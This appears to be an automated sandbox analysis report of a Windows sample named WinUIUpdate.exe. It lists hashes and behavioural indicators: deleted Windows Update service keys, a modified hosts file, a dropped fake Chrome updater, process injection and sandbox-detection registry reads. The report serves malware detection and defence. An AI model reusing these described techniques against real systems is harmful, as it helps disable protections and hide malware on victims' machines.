Analysis
max time kernel: 267s
max time network: 237s
platform: windows10-1703_x64
resource: win10-20230220-en
resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
submitted: 20-03-2023 12:07

Static task: static1
Behavioral task: behavioral1
Sample: WinUIUpdate.exe
Resource: win10-20230220-en

General
Target: WinUIUpdate.exe
Size: 3.7MB
MD5: b0a84e4330a9c00c57d3a3e7885f7946
SHA1: bfe5f9b94081c25827e2bc90bb39a8c701033519
SHA256: 6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
SHA512: a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
SSDEEP: 98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 4756 created 4040 | 4756 | WerFault.exe | 58
PID 1456 created 3912 | 1456 | WerFault.exe | 100
PID 320 created 1824 | 320 | WerFault.exe | 125
PID 3748 created 4192 | 3748 | WerFault.exe | 133
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
description | pid | Process | procid_target
PID 4192 created 3148 | 4192 | WinUIUpdate.exe | 45
PID 4192 created 3148 | 4192 | WinUIUpdate.exe | 45
PID 4192 created 3148 | 4192 | WinUIUpdate.exe | 45
PID 4192 created 3148 | 4192 | WinUIUpdate.exe | 45
PID 4192 created 3148 | 4192 | WinUIUpdate.exe | 45
PID 1800 created 604 | 1800 | powershell.EXE | 3
PID 5032 created 4040 | 5032 | svchost.exe | 58
PID 5032 created 3912 | 5032 | svchost.exe | 100
PID 5032 created 4652 | 5032 | svchost.exe | 102
PID 5032 created 3912 | 5032 | svchost.exe | 100
PID 5032 created 2120 | 5032 | svchost.exe | 123
PID 5032 created 1824 | 5032 | svchost.exe | 125
PID 5032 created 1824 | 5032 | svchost.exe | 125
PID 5032 created 4872 | 5032 | svchost.exe | 128
PID 5032 created 4192 | 5032 | svchost.exe | 133
PID 5032 created 4192 | 5032 | svchost.exe | 133
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | WinUIUpdate.exe
Stops running service(s) 3 TTPs

Drops file in System32 directory 13 IoCs
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | sysmon.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 4192 set thread context of 5032 | 4192 | WinUIUpdate.exe | 90
PID 1800 set thread context of 2500 | 1800 | powershell.EXE | 95
Drops file in Program Files directory 1 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\chromeupdater.exe | WinUIUpdate.exe
Drops file in Windows directory 12 IoCs
description | ioc | Process
File created | C:\Windows\INF\netsstpa.PNF | svchost.exe
File created | C:\Windows\INF\netrasa.PNF | svchost.exe
File created | C:\Windows\rescache\_merged\3060194815\2825129510.pri | SystemSettings.exe
File created | C:\Windows\rescache\_merged\2717123927\3950266016.pri | Explorer.EXE
File opened for modification | C:\Windows\Debug\ESE.TXT | DllHost.exe
File created | C:\Windows\rescache\_merged\3060194815\2825129510.pri | RuntimeBroker.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | DllHost.exe
File created | C:\Windows\rescache\_merged\2717123927\3950266016.pri | ApplicationFrameHost.exe
File created | C:\Windows\rescache\_merged\2717123927\3950266016.pri | SystemSettings.exe
File created | C:\Windows\rescache\_merged\2717123927\3950266016.pri | RuntimeBroker.exe
File created | C:\Windows\rescache\_merged\1742034116\2462578334.pri | SystemSettings.exe
File created | C:\Windows\rescache\_merged\4129138312\2114356439.pri | RuntimeBroker.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2948 | sc.exe
3756 | sc.exe
4628 | sc.exe
3652 | sc.exe
4656 | sc.exe
Program crash 12 IoCs
pid | pid_target | Process | procid_target
1136 | 4040 | WerFault.exe | 58
1208 | 4604 | WerFault.exe | 57
4756 | 4040 | WerFault.exe | 58
4716 | 3912 | WerFault.exe | 100
4876 | 4652 | WerFault.exe | 102
1456 | 3912 | WerFault.exe | 100
3108 | 2120 | WerFault.exe | 123
4520 | 1824 | WerFault.exe | 125
320 | 1824 | WerFault.exe | 125
4012 | 4872 | WerFault.exe | 128
4160 | 4192 | WerFault.exe | 133
3748 | 4192 | WerFault.exe | 133
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | RuntimeBroker.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | RuntimeBroker.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | RuntimeBroker.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe

description | ioc | Process
Set value (data) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | Explorer.EXE
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | sysmon.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1679317701" | OfficeClickToRun.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={0324A6DC-B1E9-4DA0-A3C9-1BF5FB29AA43}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | sysmon.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
